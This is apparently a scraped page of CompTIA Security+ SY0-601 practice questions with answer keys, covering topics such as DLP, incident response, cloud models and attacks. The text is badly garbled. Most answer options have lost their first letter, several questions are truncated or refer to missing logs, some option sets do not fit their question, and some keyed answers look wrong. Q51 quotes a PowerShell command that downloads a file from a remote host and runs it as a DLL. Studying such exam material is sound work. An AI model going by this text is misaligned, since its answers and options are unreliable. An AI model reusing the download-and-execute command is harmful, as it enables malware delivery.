DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

100% Pass Cisco, PMP, CISA, CISM, AWS Practice test on SALE!

Prepare Strategically for the CompTIA Security+ Exam with SY0-601 Practice Tests

For the CompTIA Security+ SY0-601 certification, having access to high-quality exam resources is essential for effective preparation. Practice test questions and answers that accurately reflect the exam content and objectives enable you to identify areas requiring further study. Comprehensive study guides provide in-depth explanations of topics such as risk management, incident response, cryptography, and security architecture. Video courses from trusted sources offer an engaging way to reinforce key concepts. Mock exams simulating the actual test environment help build time management skills and familiarity with the exam format. Regular practice with these exam resources helps reinforce your understanding of security fundamentals covered in the SY0-601 exam. By incorporating a diverse range of study materials, practice questions, and mock exams into your preparation, you increase your chances of passing the CompTIA Security+ certification exam successfully.
Take other online exams
Question #1
The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations. Which of the following would be the BEST solution to implement?
A. LP
B. SB data blocker
C. SB OTG
D. isabling USB ports
View answer
Correct Answer: B
Question #2
A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the BEST remediation for this data leak?
A. ser training
B. ASB
C. DM
D. LP
View answer
Correct Answer: B
Question #3
Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both organizations' SOC teams would speed up the effort. Which of the following can be written to document this agreement?
A. OU
B. SA
C. LA
D. DA
View answer
Correct Answer: A
Question #4
The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer (CIO) believes the company can implement some basic controls to mitigate the majo
A. RAT was installed and is transferring additional exploit tools
B. he workstations are beaconing to a command-and-control server
C. logic bomb was executed and is responsible for the data transfers
D. fileless virus is spreading in the local network environment
View answer
Correct Answer: AB
Question #5
A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?
A. isable Telnet and force SSH
B. stablish a continuous ping
C. tilize an agentless monitor
D. nable SNMPv3 with passwords
View answer
Correct Answer: C
Question #6
Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?
A. TP
B. SINT
C. OAR
D. IEM
View answer
Correct Answer: C
Question #7
A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?
A. ne-time passwords
B. mail tokens
C. ush notifications
D. ardware authentication
View answer
Correct Answer: C
Question #8
Which of the following terms describes a broad range of information that is sensitive to a specific organization?
A. ublic
B. op secret
C. roprietary
D. pen-source
View answer
Correct Answer: C
Question #9
An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following considerations would BEST support the organization's resiliency?
A. eographic dispersal
B. enerator power
C. ire suppression
D. acility automation
View answer
Correct Answer: A
Question #10
Which of the following controls is used to make an organization initially aware of a data compromise?
A. rotective
B. reventative
C. orrective
D. etective
View answer
Correct Answer: D
Question #11
An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the MOST likely reason for this type of assessment?
A. n international expansion project is currently underway
B. utside consultants utilize this tool to measure security maturity
C. he organization is expecting to process credit card information
D. government regulator has requested this audit to be completed
View answer
Correct Answer: C
Question #12
A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?
A. he time needed for the MRI vendor to upgrade the system would negatively impact patients
B. he MRI vendor does not support newer versions of the OS
C. hanging the OS breaches a support SLA with the MRI vendor
D. he IT team does not have the budget required to upgrade the MRI scanner
View answer
Correct Answer: B
Question #13
An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being exploited?
A. ocial media
B. loud
C. upply chain
D. ocial Engineering
View answer
Correct Answer: C
Question #14
The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of incident has become more common in recent weeks and is consuming large amounts of the analysts' time due to manual tasks being performed. Which of the following solutions should the SOC consider to BEST improve its response time?
A. onfigure a NIDS appliance using a Switched Port Analyzer
B. ollect OSINT and catalog the artifacts in a central repository
C. mplement a SOAR with customizable playbooks
D. nstall a SIEM with community-driven threat intelligence
View answer
Correct Answer: C
Question #15
A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?
A. heHarvester
B. uckoo
C. map
D. essus
View answer
Correct Answer: A
Question #16
Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?
A. VSS
B. IEM
C. OAR
D. VE
View answer
Correct Answer: A
Question #17
Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is the BEST solution to adopt?
A. PKI
B. Blockchain
C. SAML
D. OAuth
View answer
Correct Answer: A
Question #18
Which of the following is a known security risk associated with data archives that contain financial information?
A. ata can become a liability if archived longer than required by regulatory guidance
B. ata must be archived off-site to avoid breaches and meet business requirements
C. ompanies are prohibited from providing archived data to e-discovery requests
D. nencrypted archives should be preserved as long as possible and encrypted
View answer
Correct Answer: A
Question #19
A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this scenario?
A. onfiguring signature-based antivirus to update every 30 minutes
B. nforcing S/MIME for email and automatically encrypting USB drives upon insertion
C. mplementing application execution in a sandbox for unknown software
D. uzzing new files for vulnerabilities if they are not digitally signed
View answer
Correct Answer: C
Question #20
As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the auditor do to complete the assessment?
A. ser behavior analysis
B. acket captures
C. onfiguration reviews
D. og analysis
View answer
Correct Answer: C
Question #21
An IT security manager requests a report on company information that is publicly available. The manager's concern is that malicious actors will be able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?
A. rovide a domain parameter to theHarvester tool
B. heck public DNS entries using dnsenum
C. erform a Nessus vulnerability scan targeting a public company’s IP
D. xecute nmap using the options: scan all ports and sneaky mode
View answer
Correct Answer: A
Question #22
A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?
A. DoS
B. rivilege escalation
C. NS poisoning
D. uffer overflow
View answer
Correct Answer: A
Question #23
Which of the following is an example of transference of risk?
A. urchasing insurance
B. atching vulnerable servers
C. etiring outdated applications
D. pplication owner risk sign-off
View answer
Correct Answer: A
Question #24
Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?
A. isitor logs
B. araday cages
C. ccess control vestibules
D. otion detection sensors
View answer
Correct Answer: C
Question #25
The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?
A. AC
B. CL
C. AF
D. AT
View answer
Correct Answer: B
Question #26
A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?
A. aaS
B. aaS
C. aaS
D. DN
View answer
Correct Answer: A
Question #27
A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?
A. ttp://sample
B. ttp://sample
C. ttp://sample
D. ttp://redirect
View answer
Correct Answer: B
Question #28
A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?
A. oft token
B. mart card
C. SR
D. SH key
View answer
Correct Answer: D
Question #29
A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use?
A. SAE SOC 2
B. SO 31000
C. IST CSF
D. DPR
View answer
Correct Answer: B
Question #30
Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing application?
A. ntellectual property theft
B. levated privileges
C. nknown backdoor
D. uality assurance
View answer
Correct Answer: C
Question #31
Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?
A. ersion control
B. ontinuous monitoring
C. tored procedures
D. utomation
View answer
Correct Answer: A
Question #32
Which of the following tools is effective in preventing a user from accessing unauthorized removable media?
A. SB data blocker
B. araday cage
C. roximity reader
D. able lock
View answer
Correct Answer: A
Question #33
A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?
A. ecurity patches were uninstalled due to user impact
B. n adversary altered the vulnerability scan reports
C. zero-day vulnerability was used to exploit the web server
D. he scan reported a false negative for the vulnerability
View answer
Correct Answer: A
Question #34
A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. A search of the WAF logs reveals the following output:Which of the following is MOST likely occurring?
A. SS attack
B. QLi attack
C. eplay attack
D. SRF attack
View answer
Correct Answer: B
Question #35
Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?
A. sset management policy
B. eparation of duties policy
C. cceptable use policy
D. ob rotation policy
View answer
Correct Answer: D
Question #36
Which of the following would BEST provide detective and corrective controls for thermal regulation?
A. smoke detector
B. fire alarm
C. n HVAC system
D. fire suppression system
E. uards
View answer
Correct Answer: C
Question #37
A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running?
A. ileless virus
B. ogic bomb
C. eylogger
D. ansomware
View answer
Correct Answer: B
Question #38
Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?
A. LP
B. IDS
C. PM
D. DE
View answer
Correct Answer: A
Question #39
A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security measures is most likely used for this mandate?
A. nput validation
B. ode signing
C. QL injection
D. orm submission
View answer
Correct Answer: A
Question #40
A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?
A. map
B. ireshark
C. utopsy
D. NSEnum
View answer
Correct Answer: A
Question #41
A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?
A. PA3
B. ES
C. ADIUS
D. PS
View answer
Correct Answer: D
Question #42
A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will
A. edundancy
B. AID 1+5
C. irtual machines
D. ull backups
View answer
Correct Answer: C
Question #43
A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?
A. FTP was disabled on the local hosts
B. SH was turned off instead of modifying the configuration file
C. emote login was disabled in the networkd
D. etwork services are no longer running on the NAS
View answer
Correct Answer: B
Question #44
An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings?
A. he vulnerability scanner was not properly configured and generated a high number of false positives
B. hird-party libraries have been loaded into the repository and should be removed from the codebase
C. he vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue
D. he vulnerability scanner was not loaded with the correct benchmarks and needs to be updated
View answer
Correct Answer: A
Question #45
A security administrator examines the ARP table of an access switch and sees the following output:
A. DoS on Fa0/2 port
B. AC flooding on Fa0/2 port
C. RP poisoning on Fa0/1 port
D. NS poisoning on port Fa0/1
View answer
Correct Answer: B
Question #46
A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of the following is an immediate consequence of these integrations?
A. on-compliance with data sovereignty rules
B. oss of the vendors interoperability support
C. andatory deployment of a SIEM solution
D. ncrease in the attack surface
View answer
Correct Answer: D
Question #47
Which of the following controls would provide the BEST protection against tailgating?
A. ccess control vestibule
B. losed-circuit television
C. roximity card reader
D. araday cage
View answer
Correct Answer: A
Question #48
A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?
A. VE
B. IEM
C. OAR
D. VSS
View answer
Correct Answer: D
Question #49
Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a single firewall?
A. ransit gateway
B. loud hot site
C. dge computing
D. NS sinkhole
View answer
Correct Answer: A
Question #50
An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which of the following is the environment in which patches will be deployed just prior to being put into an operational status?
A. evelopment
B. est
C. roduction
D. taging
View answer
Correct Answer: D
Question #51
An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dllWhich of the following BEST describes what the analyst found?
A. PowerShell code is performing a DLL injection
B. PowerShell code is displaying a picture
C. PowerShell code is configuring environmental variables
D. PowerShell code is changing Windows Update settings
View answer
Correct Answer: A
Question #52
A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?
A. ump file
B. ystem log
C. eb application log
D. ecurity log
View answer
Correct Answer: A
Question #53
Which of the following measures the average time that equipment will operate before it breaks?
A. LE
B. TBF
C. TO
D. RO
View answer
Correct Answer: B
Question #54
Which of the following is a risk that is specifically associated with hosting applications in the public cloud?
A. nsecured root accounts
B. ero-day
C. hared tenancy
D. nsider threat
View answer
Correct Answer: C
Question #55
An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?
A. ryptomalware
B. ash substitution
C. ollision
D. hishing
View answer
Correct Answer: B
Question #56
A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this wireless network.Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?
A. PS
B. PA2
C. AP
D. TTPS
View answer
Correct Answer: B
Question #57
A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?
A. t examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future
B. t returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed
C. t identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point
D. t contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach
View answer
Correct Answer: A
Question #58
Which of the following is a reason to publish files' hashes?
A. o validate the integrity of the files
B. o verify if the software was digitally signed
C. o use the hash as a software activation key
D. o use the hash as a decryption passphrase
View answer
Correct Answer: A
Question #59
A company that provides an online streaming service made its customers' personal data, including names and email addresses, publicly available in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts. Which of the following BEST describes the consequence of this data disclosure?
A. egulatory fines
B. eputation damage
C. ncreased insurance costs
D. inancial loss
View answer
Correct Answer: B
Question #60
Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?
A. ecovery
B. eterrent
C. orrective
D. etective
View answer
Correct Answer: D
Question #61
A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26. The ChiefInformation Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following describes this type of alert?
A. rue negative
B. rue positive
C. alse positive
D. alse negative
View answer
Correct Answer: C
Question #62
A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?
A. ed-team exercise
B. apture-the-flag exercise
C. abletop exercise
D. hishing exercise
View answer
Correct Answer: C
Question #63
An organization’s Chief Security Officer (CSO) wants to validate the business’s involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?
A. n external security assessment
B. bug bounty program
C. tabletop exercise
D. red-team engagement
View answer
Correct Answer: C
Question #64
A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?
A. rivilege creep
B. nmodified default settings
C. LS protocol vulnerabilities
D. mproper patch management
View answer
Correct Answer: B
Question #65
A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?
A. non-disclosure agreement
B. east privilege
C. n acceptable use policy
D. ffboarding
View answer
Correct Answer: D
Question #66
A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company's mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:Which of the following is the most likely cause of the security control bypass?
A. P address allow list
B. ser-agent spoofing
C. AF bypass
D. eferrer manipulation
View answer
Correct Answer: B
Question #67
Which of the following is the BEST action to foster a consistent and auditable incident response process?
A. ncent new hires to constantly update the document with external knowledge
B. ublish the document in a central repository that is easily accessible to the organization
C. estrict eligibility to comment on the process to subject matter experts of each IT silo
D. otate CIRT members to foster a shared responsibility model in the organization
View answer
Correct Answer: D
Question #68
A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?
A. AF
B. ASB
C. PN
D. LS
View answer
Correct Answer: B
Question #69
A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?
A. ubject alternative name
B. ildcard
C. elf-signed
D. omain validation
View answer
Correct Answer: B
Question #70
A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which of the following tools will the other team member MOST likely use to open this file?
A. utopsy
B. emdump
C. TK imager
D. ireshark
View answer
Correct Answer: D
Question #71
The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a __________.
A. ata controller
B. ata owner
C. ata custodian
D. ata processor
View answer
Correct Answer: C
Question #72
A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?
A. rop
B. eject
C. og alert
D. ermit
View answer
Correct Answer: A
Question #73
A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?
A. DS solution
B. DR solution
C. IPS software solution
D. etwork DLP solution
View answer
Correct Answer: D
Question #74
HOTSPOT (Drag and Drop is not supported)An incident has occurred in the production environment.INSTRUCTIONSAnalyze the command outputs and identify the type of compromise.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.Hot Area:
A. ee Explanation section for answer
View answer
Correct Answer: A
Question #75
Which of the following is a targeted attack aimed at compromising users within a specific industry or group?
A. atering hole
B. yposquatting
C. oax
D. mpersonation
View answer
Correct Answer: A
Question #76
A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?
A. ntranet
B. creened subnet
C. LAN segmentation
D. ero Trust
View answer
Correct Answer: C
Question #77
A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?
A. andatory
B. ule-based
C. iscretionary
D. ole-based
View answer
Correct Answer: A
Question #78
During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?
A. s
B. hflags
C. hmod
D. sof
E. etuid
View answer
Correct Answer: C
Question #79
Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. ashing
B. NS sinkhole
C. LS inspection
D. ata masking
View answer
Correct Answer: C
Question #80
A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter th
A. n external access point is engaging in an evil-twin attack
B. he signal on the WAP needs to be increased in that section of the building
C. he certificates have expired on the devices and need to be reinstalled
D. he users in that section of the building are on a VLAN that is being blocked by the firewall
View answer
Correct Answer: A
Question #81
An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Choose two.)
A. ocial media analysis
B. nnual information security training
C. amification
D. hishing campaign
View answer
Correct Answer: BC
Question #82
A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?
A. rovisioning
B. taging
C. taging
D. uality assurance
View answer
Correct Answer: A
Question #83
Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?
A. mploy different techniques for server- and client-side validations
B. se a different version control system for third-party libraries
C. mplement a vulnerability scan to assess dependencies earlier on SDLC
D. ncrease the number of penetration tests before software release
View answer
Correct Answer: C
Question #84
Which of the following uses SAML for authentication?
A. TOTP
B. Federation
C. Kerberos
D. HOTP
View answer
Correct Answer: B
Question #85
SIMULATIONA systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.INSTRUCTIONSPerform the following steps:4. Configure the RADIUS server.5. Configure the WiFi controller.6. Preconfigure the client for an incoming guest. The guest AD credentials are:User: guest01Password: guestpassIf at any time you would like to bring back the initial state of the simulation, please clic
A. ee explanation below
View answer
Correct Answer: A
Question #86
A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:Which of the following can the security analyst conclude?
A. replay attack is being conducted against the application
B. n injection attack is being conducted against a user authentication system
C. service account password may have been changed, resulting in continuous failed logins within the application
D. credentialed vulnerability scanner attack is testing several CVEs against the application
View answer
Correct Answer: B
Question #87
Which of the following involves the inclusion of code in the main codebase as soon as it is written?
A. ontinuous monitoring
B. ontinuous deployment
C. ontinuous validation
D. ontinuous integration
View answer
Correct Answer: D
Question #88
A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company consult?
A. DPR
B. SO
C. IST
D. CI DSS
View answer
Correct Answer: A
Question #89
An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to prevent reinfection from the infection vector?
A. Prevent connections over TFTP from the internal network
B. Create a firewall rule that blocks a 22 from the internet to the server
C. Disable file sharing over port 445 to the server
D. Block port 3389 inbound from untrusted networks
View answer
Correct Answer: C
Question #90
A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?
A. ecurity patches failed to install due to a version incompatibility
B. n adversary altered the vulnerability scan reports
C. zero-day vulnerability was used to exploit the web server
D. he scan reported a false negative for the vulnerability
View answer
Correct Answer: D
Question #91
A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which of the following should be performed FIRST?
A. etention
B. overnance
C. lassification
D. hange management
View answer
Correct Answer: C
Question #92
Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link. Which of the following attacks is being used to target the company?
A. hishing
B. ishing
C. mishing
D. pam
View answer
Correct Answer: C
Question #93
A company is moving to new location. The systems administrator has provided the following server room requirements to the facilities staff:•Consistent power levels in case of brownouts or voltage spikes•A minimum of 30 minutes runtime following a power outage•Ability to trigger graceful shutdowns of critical systemsWhich of the following would BEST meet the requirements?
A. aintaining a standby, gas-powered generator
B. sing large surge suppressors on computer equipment
C. onfiguring managed PDUs to monitor power levels
D. eploying an appropriately sized, network-connected UPS device
View answer
Correct Answer: D
Question #94
Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?
A. achine learning
B. NS sinkhole
C. locklist
D. oneypot
View answer
Correct Answer: B
Question #95
During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The penetration tester stops the test to inform the client of the findings. Which of the following should be the client's NEXT step to mitigate the issue?
A. onduct a full vulnerability scan to identify possible vulnerabilities
B. erform containment on the critical servers and resources
C. eview the firewall and identify the source of the active connection
D. isconnect the entire infrastructure from the internet
View answer
Correct Answer: B
Question #96
A security analyst discovers that a company's username and password database was posted on an Internet forum. The usernames and passwords are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?
A. reate DLP controls that prevent documents from leaving the network
B. mplement salting and hashing
C. onfigure the web content filter to block access to the forum
D. ncrease password complexity requirements
View answer
Correct Answer: B
Question #97
Which of the following is an example of risk avoidance?
A. nstalling security updates directly in production to expedite vulnerability fixes
B. uying insurance to prepare for financial loss associated with exploits
C. ot installing new software to prevent compatibility errors
D. ot taking preventive measures to stop the theft of equipment
View answer
Correct Answer: C
Question #98
A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?
A. OP
B. PSec
C. MAP
D. GP
View answer
Correct Answer: D
Question #99
Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?
A. mart card
B. ush notifications
C. ttestation service
D. MAC-based
E. ne-time password
View answer
Correct Answer: B
Question #100
A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it. Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the following should the company do to help accomplish this goal?
A. lassify the data
B. ask the data
C. ssign the application owner
D. erform a risk analysis
View answer
Correct Answer: A
Question #101
Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. Which of the following documents did Ann receive?
A. n annual privacy notice
B. non-disclosure agreement
C. privileged-user agreement
D. memorandum of understanding
View answer
Correct Answer: A
Question #102
Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?
A. ata retention plan
B. ncident response plan
C. isaster recovery plan
D. ommunication plan
View answer
Correct Answer: C
Question #103
An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:
A. push notification
B. password
C. n SMS message
D. n authentication application
View answer
Correct Answer: B
Question #104
An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection mechanism to deter malicious activities. Which of the following is being implemented?
A. roximity cards with guards
B. ence with electricity
C. rones with alarms
D. otion sensors with signage
View answer
Correct Answer: D
Question #105
An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?
A. ocument the collection and require a sign-off when possession changes
B. ock the device in a safe or other secure location to prevent theft or alteration
C. lace the device in a Faraday cage to prevent corruption of the data
D. ecord the collection in a blockchain-protected public ledger
View answer
Correct Answer: A
Question #106
Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?
A. eak configurations
B. ntegration activities
C. nsecure user accounts
D. utsourced code development
View answer
Correct Answer: A
Question #107
Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?
A. alk-throughs
B. essons learned
C. ttack framework alignment
D. ontainment
View answer
Correct Answer: B
Question #108
Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?
A. P schema
B. pplication baseline configuration
C. tandard naming convention policy
D. ireless LAN and network perimeter diagram
View answer
Correct Answer: C
Question #109
A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the flowing entries:Which of the following password attacks is taking place?
A. ictionary
B. rute-force
C. ainbow table
D. praying
View answer
Correct Answer: B
Question #110
An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users' corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized?
A. rute-force
B. eylogger
C. ictionary
D. ainbow
View answer
Correct Answer: C
Question #111
Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?
A. AC
B. LP
C. DS
D. FA
View answer
Correct Answer: A
Question #112
To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST accommodate the request?
A. aaS
B. aaS
C. aaS
D. aaS
View answer
Correct Answer: D
Question #113
A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator’s activities?
A. ontinuous deployment
B. ontinuous integration
C. ata owners
D. ata processor
View answer
Correct Answer: D
Question #114
The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?
A. DPR compliance attestation
B. loud Security Alliance materials
C. OC 2 Type 2 report
D. IST RMF workbooks
View answer
Correct Answer: C
Question #115
Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?
A. phishing email stating a cash settlement has been awarded but will expire soon
B. smishing message stating a package is scheduled for pickup
C. vishing call that requests a donation be made to a local charity
D. SPIM notification claiming to be undercover law enforcement investigating a cybercrime
View answer
Correct Answer: C
Question #116
During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server. Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain a presence in the network.In which of the following stages of the Cyber Kill Chain is the adversary currently operating?
A. econnaissance
